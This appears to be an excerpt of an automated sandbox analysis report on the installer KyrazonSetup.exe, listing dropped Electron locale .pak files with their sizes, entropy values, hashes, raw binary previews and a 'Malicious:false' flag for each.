                                                                                    Preview:.........#..e.b...h.j...i.{...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.$...}.6.....>.....C.....K.....S.....[.....b.....i.....p.....q.....r.....t...................................<.................)...................................B.....\...........R.........................................>...................................9.....[...........q.................L...................................[.....m...................................C.................(.......................9.......................L.......................{...........E.....\...........J.......................x.................*.......................Y.............................N.................%.......................................................................X.................D................./.....F...........+.....W.....j...........a.................8.............................7.....s.................................../.......................X.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\el.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):929418
                                                                                    Entropy (8bit):4.738354677437668
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:ovf5YcXPdGgx11hxi9c9N+JXDsSYSmqHMuD2fpoLwj3BAVH8+VdQ5tNDQo32Etfd:2f5YcXPdGgx11hxi9c9N+JXDsSYSmqHe
                                                                                    MD5:A14D8A4499A8B2F2F5908D93E2065BF7
                                                                                    SHA1:1473A352832D9A71C97A003127E3E78613C72A17
                                                                                    SHA-256:EB46D9860835B69D33B2583D1E52B20238B666B967BF00906424E3C8A161ED64
                                                                                    SHA-512:427271D12590F8EA3F11B83E4C0CE79C55C289573C5F6E5C70C789B28A5181F295A3C9B1A4BDD1F731F338E6EDB1E06318EA6410CEAC546128A84FF8F2EC0B40
                                                                                    Malicious:false
                                                                                    Preview:........f#m.e.*...h.2...i.:...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....1.....X.....}.....................................................8.....n.....v.....J...........(.....K...........`...........]...........C.....d.............................................../.....7.....1...................................,.................A.....l.....].....................................................I.................l...........b...........,.................V.....1...........w...........k.....7.......................i.......................s.......................k.......................................... ....^!.....!.....!.....".....#....V#....r#..../$.....$.....%....J%....7&.....&....s'.....'....p(.....)....V)....})....H*.....+....h+.....+.....,....5-.....-.....-...../....30.....0...."1....#2.....3....~3.....3.....4.....5....Q6.....6....=7.....8....q8.....8.....9.....:.....;

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\en-GB.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):418411
                                                                                    Entropy (8bit):5.526282387769971
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:A8iCFs0mZ2dXipvrIQoqbh7GMP9eRT/LfaY1+/845prSQBE0RbhU:AJCyeXipvrI7IGMuT/7o5ZSsU
                                                                                    MD5:9D9121BDC9AF59B5899CE3C5927B55D8
                                                                                    SHA1:568626A374CD30237C55B72C74B708DA8D065EC1
                                                                                    SHA-256:F4D45CCC89834376F35D4D83FE5B2D5112B8CC315FCB03228720749AAE31C805
                                                                                    SHA-512:149A8ACF256DC12F62706F72AD8EC88CBFDF7F8DC874BCD9FACF484CDB00E7C5787F5E1BBC12B5BBE1B19B6524E7E8A1C7DBA2838ABEB9AAFA3CE89795FD22AE
                                                                                    Malicious:false
                                                                                    Preview:.........#..e.....h.....i.....j."...k.1...l.<...n.D...o.I...p.V...q.\...r.h...s.y...t.....v.....w.....y.....z.....|.....}.....................................................................................>.....O...........".....i.....|........... .....Q.....a...........!.....].....s.................G.....\.......................%.....n.......................7.....|.......................o.......................].......................3.....^.....n.......................9.................D.....X.............................6.....q.............................:.....F................. .....3.............................L.............................Q.....y.......................;.....F.................<.....Q.............................a.............................a.......................5.....j.......................'.....6.....................................................~.................<.................3.....P.......................-.....t.......................C.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\en-US.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):421711
                                                                                    Entropy (8bit):5.516302021610083
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:MOoiE2KSqdBEuUu6/9meKMP9e7X9ifaY3yzq5J7SKn0F/lOSwH:n5EC2B4bKMwX9cj5hSwSwH
                                                                                    MD5:626F30CFD9AD7B7C628C6A859E4013BD
                                                                                    SHA1:02E9A759C745A984B5F39223FAB5BE9B5EC3D5A7
                                                                                    SHA-256:0FD74BB69AD35B3F9391FA760BF0EB0EE73D2BEA0066244577EF2ABD269513DE
                                                                                    SHA-512:9CE902F21FEF70C5B5AF444B532B36C9A00D896878CB4021C9B1DC07AA3277D956BCA65EE0ADB68467EEC113E535B60A8A5FB5414C7D0CA761CEAE5C43B7D9A9
                                                                                    Malicious:false
                                                                                    Preview:.........#..e.Z...h.b...i.j...j.v...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.%.....-.....2.....:.....B.....J.....Q.....X....._.....`.....a.....f.....s.............................w.................(.....u.......................u................. .....k.......................@.....i.....w.................*.....7.............................g.......................Y.......................5.....|.......................K.....w.................K.............................2.....A.............................%.....b.......................7.....i.....|.................@.....L.............................V.............................[.......................J.......................*.....M.....c.............................m.......................=.......................$.....[.....v.................$.....N.....^.................;.....S...........$.....m.....{...........7.....n.................-.....Y.....h.............................z.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\es-419.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):508230
                                                                                    Entropy (8bit):5.385230992997236
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:iEsyQDjcRy2VdU1P2BCA6bKVjnE4rHOniSb8p5Yl+lblmwoab5uIay5LlZi+SLFv:iEsyQvt2ECiOX3p5YWm85wLFaoImYA
                                                                                    MD5:6F4613A4A88AF6C8BD4EF39EDEEE3747
                                                                                    SHA1:C8850A276D390DF234258D8DE8C6DF79240C8669
                                                                                    SHA-256:8F7B8776E61E3ED5AA33B1A571AC834653B54B12A499D956B95D567B7E1BA987
                                                                                    SHA-512:E5933DCB2AAAA2018BA8B13F4AF3DC8A950640AC60ACB1B56AD6DE24541701D0FFC1F4CB28C7932AF924BFD673EDCEE20BF649156AB95EA9499EC43C703EA141
                                                                                    Malicious:false
                                                                                    Preview:........q#b.e.@...h.H...i.Q...j.]...k.l...l.w...n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}...................!.....).....1.....8.....?.....F.....G.....H.....J.....\.....k.................*.................9.................V.....n...........~.................u...........,.....G.......................'.........................................]...................................e.................).................<.....S...........?.................:.................9.............................p.......................g...................................2.....E.................G.....S.................0.....;.........................................,.....<.........../.....{.................V.......................X.................I.........................................t.......................j...................................).....C...........X.................c...........".....P...........6.....z.................'.....J.....]...........N.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\es.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):507855
                                                                                    Entropy (8bit):5.361522715042697
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:NPKK+SmGmQaXDFY1+hM03GgDE7pF+E8y1l4Fj05fYrK3osSl6PZjHu:ZKKDmXXDdq01ap4y1lEj05Qr0osTO
                                                                                    MD5:A24E01A4947D22CE1A6ACA34B6F2A649
                                                                                    SHA1:750C2550465C7D0D7D1D63AD045B811B4A26DC55
                                                                                    SHA-256:848D422BE1B8FAE74786ED6D6DFA7DD2E97B798B4A9BA1D929085E425B2A54E0
                                                                                    SHA-512:02FC4CE96AA523EBC204243BBEC3347B09CB20BCC0BA66CF9532A6FB26C48F7F2396BBB833F1916F8F081FFC9C6CD2DE07315E66C5115042A0B44270FA4468C1
                                                                                    Malicious:false
                                                                                    Preview:........q#b.e.@...h.H...i.P...j.\...k.k...l.v...n.~...o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}................... .....(.....0.....7.....>.....E.....F.....G.....I.....\.....l................./...........'.....B...........$.....j...............................................9.....T.................>.....N.................8.....I...........C.................7.......................{...........).....:.................F.....[...........O.................G.................0.....................................................v................. .......................2.......................'.....{.......................b.......................Y.......................h...........$.....>................. .....=.......................4.................@.....S...........H.................-.....y.................!.....w.................7.......................}...........a.....x.............................w...........!.....5.............................|...........$.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\et.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):460480
                                                                                    Entropy (8bit):5.4631405749616855
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:2Ve10hVbtjvP4cCJ1ONRCOeP+sEmThFC0jmFohH4fSpY0lgtim0DM5Oju43sPZCo:+eQtjvP4cnre/tHmFoh99M5Oj+x
                                                                                    MD5:82A07B154CB241A2EBE83B0D919C89E9
                                                                                    SHA1:F7ECE3A3DA2DFB8886E334419E438681BFCE36CF
                                                                                    SHA-256:84866CCAF2EC39486F78E22886BEF3FE75C1EB36E7A7C071471040E12018DB28
                                                                                    SHA-512:07319D155BDF9E27762ECB9EF6871430BEF88B1AF129450EB65AA798EBAA4E02B25B0CF9BDE3B12FF1B04A3D14241569B73D6AF895D2E85DD7B24D393E7317E9
                                                                                    Malicious:false
                                                                                    Preview:.........#T.e.\...h.d...i.u...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.0.....8.....=.....E.....M.....U.....\.....c.....j.....k.....l.....n.....~.......................9...........0.....K.................J.....]...........?.....|.................[.......................S.......................B.....m.................A.....j.................f.........................................!.......................1.......................^...........!.....8.......................:.............................e.......................].......................i.................#.....s.......................j.......................j...................................5.....M.......................0.......................5.......................'.................#.....O...............................................!.................%.....@...........;.................)...................................&.....3.............................e.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\fa.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):756165
                                                                                    Entropy (8bit):5.0211117057378845
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:DCD38/+r28u313uyqoe+slXcfqEdvRmXzoT4WmdAQifaQ2XxFHGk62BtMX9OxRdn:DCDo+r28u313uyqoe+seqIvRmXzoT4Ws
                                                                                    MD5:C770CFB9FBABDA049EB2D87275071B54
                                                                                    SHA1:20E41B1802C82D15D41FADAF3DCD049B57891131
                                                                                    SHA-256:DAE7E7C87026CD4E8A4CD813CC71DEF32C86ED47865CE6DA5383B66B7021C5BC
                                                                                    SHA-512:CDA117A60C853F12ADE579C34FCE22D992B33DF1F5001A237767B6E642D5C775C3387BCEE05D6557FE5A2F6235F93258954A697D3B9812D2550C4801869F4751
                                                                                    Malicious:false
                                                                                    Preview:........##..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.#...v.8...w.E...y.K...z.Z...|.`...}.r.....z.............................................................................:.................q...........D...........[.....}.....E.......................o.......................G...........9.....L...................................%.....g...........P...........E.....m...................................L.................o...../.......................\.................{...........7.....[...........c.................9.................&...........^.................S...........3.....J...........V................................... ...........F.................F...........R.....u...........z.................t...........Y...........).................6.......................!.................<.....W......................./...........b........................ ....m!.....!....P"....."....R#.....#....=$.....$....3%....V%.....%....T&.....&.....&....J'.....'....6(....^(

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\fi.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):470482
                                                                                    Entropy (8bit):5.425789814492222
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:K+2JevEiMD19i//8e36bwFh20RtrZs6TIOEysaI9LL59YWyHrE5WacpoPWmMWO4C:K+9Hs19S/rKJam59YdHrE5WaipKYn
                                                                                    MD5:FE011231BBC8B3A74652F6A38F85BC88
                                                                                    SHA1:2B851E46738D466B3A5A470DE114D15051B6EB6B
                                                                                    SHA-256:7A3249514585491EB47FE4B579EDC27CCC48761E7AD6BC11D113B257132C5DD2
                                                                                    SHA-512:2A4E5C1409347B4B514556C81EF32C8AE118ADD28E3469717B13045C8424FED9B817C7988629050ED3E732E0CDCA181891B6A8B9E64E4C8D65F004D7C8DB9796
                                                                                    Malicious:false
                                                                                    Preview:.........#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.+...y.1...z.@...|.F...}.X.....`.....e.....m.....u.....}.................................................................o...........B.....U.................N.....a...........>.....x.................b.......................W.......................(.....H.....X.................*.....D...........'.....i.................5.....a.....w...........7.....f.....{...........8.....i.................q.................).....|.......................O.....r.......................4.....@.............................o.......................T.......................0.............................f.......................y.................&.....k.......................K.....m.................I.....m.....|...........H.......................1.....H.....W.................8.....J.................?.....Y...........\.................-.......................=.............................Z.....s.................7.....b.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\fil.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):531993
                                                                                    Entropy (8bit):5.200104622437094
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:VJPfDjGZPitD/ty3DQZIbpiWFevNnGFZ338mC5oVms68ARrq8:VhGAodn7C5Sm7
                                                                                    MD5:7354DE570C8132723C8E57C4CCB4E7C4
                                                                                    SHA1:177780FAF460E3C8A643A4D71C7A4621345A8715
                                                                                    SHA-256:91149190C856195FB330605686ACF09C7197E5B7EFE37FE2A7C76BB8FB08CC89
                                                                                    SHA-512:A8487A6A7FD46D62E78CA4262DE49E12C120268561EE61A642C45EFA48116EDEBEB40CF9E8BE229DB0BBF06BB6B5457CC54399A08EE6A603E5540EF5CA482798
                                                                                    Malicious:false
                                                                                    Preview:.........#..e.....h.....i.0...j.<...k.K...l.V...n.^...o.c...p.p...q.v...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................%.....&.....'.....,.....9.....N.....d.............................*...........!.....f...........#.................7...........,.....p.................P.......................c.................:.............................0.....~...................................n.................4.........../.....y...........(.................6................. .....=....................... .....u.......................z...........%.....;.................=.....L.................A.....O.................A.....O.................D.....R...........S.................$.............................p.......................m.................7.................'.......................2.................C.....^...........R.................[...........^.....t.............................{.................4.......................*........... .....\.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\fr.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):550280
                                                                                    Entropy (8bit):5.387288883804832
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:V06pImfHXFZLiQphDDq6QuaMV5wKzvOtXDZ/MYnYtgLXfyzEi5Qx0JSWkv40wCns:VNfqsVaC5WK
                                                                                    MD5:D8B4BC789A0C865FB0981611FB5DCDBC
                                                                                    SHA1:33F9F03117F0BBA56A696F2FA089BA893EE951A2
                                                                                    SHA-256:52AA0A18ACE6347B06A89E3851A1B116812C022DBE41DA8942278878B5409CEE
                                                                                    SHA-512:58D19E5A3C68C901FA2A0C327A45B410AB9B9E6C39298DB48EED25345453DCE1A4633AFE6277CF53ED558E160065B89C0E38A32CAECED47E79783DBDA4D74F26
                                                                                    Malicious:false
                                                                                    Preview:........S#..e.....h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...q.c...r.o...s.....t.....v.....w.....y.....z.....|.....}.........................................................................&.....4.....F.....U.......................<...........#.....c.....{.........................................;.....d.................D.....T...........(.....c.....x...........m................._.................0.................M....._...........7.....t.................r.................a...........M.....m...........2.....c.....z...........,.....V.....h...........2.....h.....z...........J.......................a.......................\.......................I.....u.................H.....z...................................p.......................b.......................O...................................g.................J.....g.....}...........i.................H...................................m.................r.................j...........6.....O.................+.....?...........+.....p.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\gu.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1074089
                                                                                    Entropy (8bit):4.312676397057413
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:QIEt+9TXuSm4vSDnlrjqy5HIwjAwREJKVMjNiT7llj63rFWlPvpMi5eQWiYJ+WRc:QIEtYXuLUKlrjTa4/WP5c4h6vFX
                                                                                    MD5:225167DBDF1D16B3FAFC506EB63F6D1D
                                                                                    SHA1:8651B77F41E3C5B019CCB124A7C8F6449A04B96C
                                                                                    SHA-256:FF379DD77136B9B85E7E9FCB5B261ACE9C6D9184AF3BA2DEA35B1757B9BAB6D9
                                                                                    SHA-512:A353D36A87B6608578816056647DE45A456F9012D399B2CB5CB7B9DE867A370FCAF1A90D293F367B9B678D13991294425ABD85CF77E971AFA0D3E9C316952115
                                                                                    Malicious:false
                                                                                    Preview:........h#k.e.....h.6...i.P...j.\...k.k...l.v...n.~...o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}................... .....(.....0.....7.....>.....E.....F.....G.....L.....n.......................2...../...........<...../...........s.......................j.................1.............................b...........B...........,.....L...../...........J.......................&.....h.....>.............................e.................................................................k...........@.....g..... .................=...................................m.......................v.......................M.................a...........h...........:...........E.....d.....w...........,.....b...... ..... ...."!....K!.....!....P"....|"....."....Q#....2$.....$.....$.....%.....&....D'.....'....i(.....)....L)....~)....a*....'+.....+.....+.....,....t-..........6.....]/.....0....X1....y1.....2....y3.....4....`4....L5.....6.....6.....6.....7....C8.....8.....8.....9.....:....n;

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\he.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):661497
                                                                                    Entropy (8bit):4.632075612159233
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:9xsskchOxS28YeqhCdrNGmnSWqo/IQXOl60pACDXbheQCap125nVwo9Ps5plm7oM:9Bk7g5Wof
                                                                                    MD5:D8320B09C1E138B00655DB0802687BCA
                                                                                    SHA1:01616BDA6B22C70D5C6440B7451AE736EB1336CB
                                                                                    SHA-256:E3336668AAD9AD661E7F589F1A405B9C95FC771261CDF9328ACA88F4BE763374
                                                                                    SHA-512:5A91596D7E82DC3D692083AE45AFF6FDBDDD08CA17F49A020E0769F98C4218B6C9CD31E54524473B7CDCCBEBF4D7A7F0FF23B5075A1E1ADA5CC35C3FD0172BED
                                                                                    Malicious:false
                                                                                    Preview:........D#..e.....h.....i.....j.....k.....l.%...n.-...o.2...p.?...q.E...r.Q...s.b...t.k...v.....w.....y.....z.....|.....}...............................................................................(.....A.....^.....#...........b.........................................3.................8.................).................g.....x...........[.................;.............................*.....|...........:.................8.........../.....u.........................................S.................j.................).................E.....X...........t.................^.................#.................Z.....o...........U.........................................V.............................<.................-.......................]...................................O.....n.............................v.........................................4...........I.......................I.............................[...........;................./.................K.....o.....$.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\hi.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1128743
                                                                                    Entropy (8bit):4.289393956482131
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:CaaJyCmCd3RTaIEDOGV/BB0ZV1dsuOlRLXW3XHij0TByntDPtDlSp1s4u/8WLw3k:aQDa3RTaISOOz5j5thGM
                                                                                    MD5:9E1788B0F3E330BAF2B9356A6C853B20
                                                                                    SHA1:A2F4B37A418669E2B90159C8F835F840026128D9
                                                                                    SHA-256:C640313E10E985A58D16F928D2428AE278421A070D948733AC68FDF7312090FD
                                                                                    SHA-512:B9A577E084F8DAEB53FAD0A9423661C99CAB272125899A16B0B052606A2CB88F823137F3A21B5C06B10E0235321B7FACA84CD759BF406FB2DD02C2F598E92CB5
                                                                                    Malicious:false
                                                                                    Preview:........0#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.)...s.:...t.C...v.X...w.e...y.k...z.z...|.....}.....................................................................................B.....{................._.................}...........B.....p...................................&.....U.....(...........6.....f.......................<.....#...........&.....c...........l...........$.......................W.....>...........l.......................$.....V.................S...........g...........m...........Q...........U.....................................................3.......................#...................................B.................j.....".....|......................., ....\ .....!.....!....."....<"....."....X#.....#.....#....p$.....%.....%.....%.....&....a'.....'....;(.....(.....).....).....).....*.....+....[,.....,.....-....A............/....x0.....1.....2.....2.....3.....4....+5....m5.....6.....7.....8....t8....h9....&:.....:.....:.....;.....<....$=

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\hr.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512611
                                                                                    Entropy (8bit):5.519796392618245
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:3byA6gCM6By7Nv7vr7hA8aBV08Iouo+wvxr0Xcp/AikOSAqb+HicHE0uP1P4NUFn:Ahwxfh+cwJPwd75or76l/4c
                                                                                    MD5:AF7AEC4B45EAD620463B732E16F63E47
                                                                                    SHA1:E6838C56B945C936FDB87389FDC80CDF7BC73872
                                                                                    SHA-256:BFEEAFE2F8A9F797D20C4209181C4768FBEA4A61FF2DC1F57F6CD18BC872FC13
                                                                                    SHA-512:784FF8DC6011883E931B4B8371E5ADA960120931BFDF24F81648F5092FA31DB1D03E5D3CF5CD16D57EA7FB7877BB25A28533085AB42BFE40DC25CA7D9CEE7ADE
                                                                                    Malicious:false
                                                                                    Preview:.........#T.e.\...h.d...i.u...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.0.....8.....=.....E.....M.....U.....\.....c.....j.....k.....l.....n.....z.......................E...........3.....T........... .....X.....m...........d.................?.......................S.......................G.......................F...................................K.....m...........9.....}.................Y.....................................................s.................D.....k.......................@.....Q.............................u.................#.....y.......................x.................'.....y.......................].......................m...........-.....H.......................'.............................c.......................w.................P................. .....6.................5.....N.........../.................'...................................:.....^...........!.....P.....a.........................................H.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\hu.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):551843
                                                                                    Entropy (8bit):5.644800761543747
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:0sTpI7ceE8WnOL42HPs2P0Ar7ky1XB5VwFZfpadYGDuU1gGse33a5gRFxztGateg:0spI7Y8WQ+AXB5VwAtj/3a5t+D
                                                                                    MD5:B93BEEB1E35A29B310500FA59983F751
                                                                                    SHA1:45C0B2CAB4C4A820CFC2AED4B7236DDC79A0DB00
                                                                                    SHA-256:BAB09C3CB80130A4A288642633C2B31AB08B1757466D9A468BC36D276079F002
                                                                                    SHA-512:249DE5B8BD7C4755CAA8B9552254D353B0D885B63BD5F7C6C8E29B3F4E447C9E8D6C0E88D5AABA0B898AA26880592B3904E19CA4797A2AC1DD757AAEE782C37C
                                                                                    Malicious:false
                                                                                    Preview:........E#..e.....h.....i.....j.....k.....l.%...n.-...o.2...p.?...q.E...r.Q...s.b...t.k...v.....w.....y.....z.....|.....}...............................................................................!.....6.....J.......................7.................v...............................................8.....Q...........+.....R.....c...........9.....r.........................................).........................................K...................................`.....z.........................................:.....W.........../.....V.....n...........F.....q...............................................U.....k...........v.................-...................................X.....l.............................M.......................t.................)................./.....G...........C................./.......................%.....~.................R.................(...........V.................|...........L...................................b...................................Q.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\id.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):454027
                                                                                    Entropy (8bit):5.384059218448116
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:f91C6s7szabK6s1o8Jf+eVnjHF26miZ0FZ58VhrwkK5R3SzP7IEji40Hf:fu7Bu6F85VnjHFXmM0b58VhAf
                                                                                    MD5:BC719B483F20E9A0B4B88969941C869D
                                                                                    SHA1:4D926A9ABA7C350E9DA8AA570A9F52534C81AA88
                                                                                    SHA-256:F175E58BE47B228803AA32D2695E2FCFAF4655B65B96FB6B539B3E59593E6799
                                                                                    SHA-512:DDF6108888676C1A90865DAAA88198B681B685D9047B0E10F5AA08DAA39A628A84732A8518606176529297BEC51CE8BC39E910EEFFC8B88E9585FAFB694C35DB
                                                                                    Malicious:false
                                                                                    Preview:........[#x.e.....h.....i.-...j.9...k.H...l.S...n.[...o.`...p.m...q.s...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................".....#.....$.....&.....4.....A.....Q.....c...........I.......................J.....w.................J.......................d......................._.......................0.....Q.....h...........'.....V.....z...........2.....d.....{.................H.....U.................*.....7.................8.....K...........&.....k............................./.....{.......................A.............................m.......................R.......................*.....V.....`.................0.....<.......................).......................%.....m.......................(.....h.......................F.....q.................*.....[.....}.......................)...............................................)...........!.....z.................S.......................Z.......................!.....@.....P.................F.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\it.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):501266
                                                                                    Entropy (8bit):5.293951985847116
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ZckXLmyax92+fMiMNDYISIqRRRsO1StBWRT9Tjex6qipELqbPpzHi9fLwsQ2nbwb:iWmhH6mZD28HG4KUw05klot
                                                                                    MD5:AB160B6E8BBABA8F8BDE7E2D996F4F2E
                                                                                    SHA1:EB7EAE28A693337B8504E3E6363087B3B113BC72
                                                                                    SHA-256:E86BA661B3F6F7ECD2312FE90B873330C0D6516A5501A0F326875844E8D4B289
                                                                                    SHA-512:14E8919E2F5A7AD2B3F310FFEC590B221E6E0DC45F37EFC57FF9B8FF7A3CA674D6F4B9BD65E49A98AF6726FA953F2168E5C8E6101ED977E8C7FF4A51203F8D4D
                                                                                    Malicious:false
                                                                                    Preview:........a#r.e. ...h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...q.....r.....s.....t.....v.....w.....y.....z.....|.....}..................................... .....'.........../.....0.....2.....E.....T.....m.....~.........................................&.....7.........../.................?.......................l.......................;.......................>...................................S.....x...........G.......................^.................".......................l...........3.....Q.................+.....I.............................e.......................H.......................P.......................0.....~.......................R............................._.....j...........Q.......................[.............................,.....B.......................1.................T.................2.....X.....m.................3.....F...........+.....~...........3...........#.....:...........4.................+.......................F.......................(.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\ja.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):613077
                                                                                    Entropy (8bit):5.6866751137991765
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:a1AxTSuPJmsKRC/uGsDKNJL+iCrtZKQ2xM6bU5B7YxVD:a2xYsKRC2GsDa9StZKQ2xM75B7m
                                                                                    MD5:DEE9626A8D7CACC7E29CFF65A6F4D9C3
                                                                                    SHA1:5C960312F873AB7002ED1CCE4AFDB5E36621A3CE
                                                                                    SHA-256:63AD3974BAA8C160BA30448171F148D008AC19E80010FB13D3A65CF411B67AE0
                                                                                    SHA-512:EE80D58886F4AC378D6491E075062C171A715AF7C42DD1785952B25A572381ACD722764E8BE914ADBFCCF2A5FA4A51968B989B632EEFB9D636851F1B8FFB82E1
                                                                                    Malicious:false
                                                                                    Preview:........."'.e.....h.....i.....j.....k.....l.....m.....o.....p.....q.....v.(...w.5...y.;...z.J...|.P...}.b.....j.....o.....w...................................................................................;...........a.................P.............................G.................{.....&.................;.......................\...................................3.....X...........g.................?......................._.......................}...........%.....4...........{.................b...................................>.....Y...........l.................{...........g...................................j...........*.....<...........'.....c.....r...........}.............................o...................................a...................................\.....z.............................q...................................<.....W...........,.....f.....|.....$...........,.....A...........Z.................b...........!.....B...........0.....i...............................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\kn.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1231605
                                                                                    Entropy (8bit):4.220671500631487
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:UNHCRmR6fkA6GjYQnbY25l67c5qBUic+E+htyR:UNiRmR6Lr5mUJ
                                                                                    MD5:32E5F528C6CEE9DE5B76957735AE3563
                                                                                    SHA1:74A86191762739D7184B08D27F716CFA30823A98
                                                                                    SHA-256:CD297F7E872B34E63CA2D98DC2FA79085E8A2985BA8757601E4B901A3F30B013
                                                                                    SHA-512:92D100B1289E63FD0DC65657FB4B1E16F298735E6CD066E9122D04E3B79E0D286F15FC9F1DA2C3A05AF528B92BDE95FCFBC493C466DB2D94A0749ADFBF7FB8D5
                                                                                    Malicious:false
